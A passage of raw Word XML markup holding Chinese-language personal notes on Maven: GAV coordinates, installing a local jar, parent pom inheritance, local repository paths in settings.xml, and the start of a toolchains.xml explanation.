        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>artifactId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通常是项目的名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F5460" w14:textId="1D07A661" w:rsidR="00D22D0A" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;version&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的版本号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED23E77" w14:textId="77777777" w:rsidR="00D22D0A" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201C3180" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682CD024" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A39F056" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装自己使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包，到本地的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库（必须指定一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GAV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不指定没法安装）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5E55D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mvn install:install-file -Dfile=SSLSocket-1.0.0.jar -DgroupId=cn.blingsec -DartifactId=SSLSocket -Dversion=1.0.0  -Dpackaging=jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483CEA51" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A795DA" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9EDEB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pom.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D221F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.cnblogs.com/chensisi/p/13343602.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626CD4EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04312852" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>主要是两个场景用法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE4894F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16748C65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不写依赖，引用父</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中的依赖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103AB95D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>父</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pom.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写在子项目的上级目录中，会有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GAV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5E0E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签，其中写父</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GAV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0E525" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样子项目就可以引用父</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的依赖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9361E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1FD43A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>多个子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>引用共同依赖，由父</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>去修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GAV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的版本号，子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只需要写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而不用写完整的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GAV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D91D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3779F291" w14:textId="43D3C48F" w:rsidR="00167B33" w:rsidRDefault="00167B33" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算机中多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且</w:t>
      </w:r>
      <w:r w:rsidR="007F7075">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidR="007F7075">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>repository</w:t>
      </w:r>
      <w:r w:rsidR="007F7075">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径不同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CE88D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3542F8" w14:textId="0D2C377B" w:rsidR="00B2752B" w:rsidRDefault="0099413A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存在这么主要的两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D443717" w14:textId="6B0A9A83" w:rsidR="0099413A" w:rsidRDefault="00512979" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我自己安装的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mvn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intellij</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maven</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00512979">
        <w:t>E:\BiLing\maven\apache-maven-3.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212460E" w14:textId="450A3358" w:rsidR="004C452C" w:rsidRDefault="00512979" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intellij</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00512979">
        <w:t>C:\Program Files\JetBrains\IntelliJ IDEA 2021.3.3\plugins\maven\lib\maven3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42168950" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B02EC6" w14:textId="3D145AA9" w:rsidR="00037FEA" w:rsidRPr="00512979" w:rsidRDefault="00991CA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mvn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759E9036" w14:textId="2AC19068" w:rsidR="004C452C" w:rsidRDefault="00037FEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00037FEA">
        <w:t>C:\Users\ranja\.m2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0F52C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605ABD00" w14:textId="77777777" w:rsidR="009249F1" w:rsidRDefault="00BB3503" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mvn</w:t>
      </w:r>
      <w:r>
        <w:t>/conf/settings.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8B13C" w14:textId="557D288B" w:rsidR="009249F1" w:rsidRDefault="009249F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009249F1">
        <w:t>&lt;localRepository&gt;C:\Users\ranja\.m2\ &lt;/localRepository&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0216DE47" w14:textId="20734D0D" w:rsidR="009249F1" w:rsidRDefault="009249F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后来发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mvn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件下载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00037FEA">
        <w:t>C:\Users\ranja\.m2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r w:rsidRPr="009249F1">
        <w:t>C:\Users\ranja\.m2\repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29097D99" w14:textId="48F783AB" w:rsidR="009249F1" w:rsidRPr="009249F1" w:rsidRDefault="009249F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>settings</w:t>
      </w:r>
      <w:r>
        <w:t>.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中此配置改回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A51F4" w14:textId="14119892" w:rsidR="00991CA3" w:rsidRDefault="009249F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009249F1">
        <w:t>&lt;localRepository&gt;C:\Users\ranja\.m2\repository&lt;/localRepository&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BBB896" w14:textId="77777777" w:rsidR="00991CA3" w:rsidRDefault="00991CA3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E6F973" w14:textId="7B63FABF" w:rsidR="004C452C" w:rsidRDefault="008E562C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常情况下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mvn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地库，</w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户目录</w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.2/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>repository</w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ettings.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="008E562C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4B0C1" w14:textId="77777777" w:rsidR="009249F1" w:rsidRDefault="009249F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE7D4A0" w14:textId="7C4C7D40" w:rsidR="009249F1" w:rsidRDefault="00EA2318" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r>
        <w:t>chains.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3255153E" w14:textId="77777777" w:rsidR="00EA2318" w:rsidRDefault="00EA2318" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13562341" w14:textId="77777777" w:rsidR="0005027A" w:rsidRDefault="0005027A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">toolchains.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maven </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一个配置文件，它主要用于指定和管理不同的构建工具链。工具链可以包括各种构建和开发工具，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而不仅仅是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
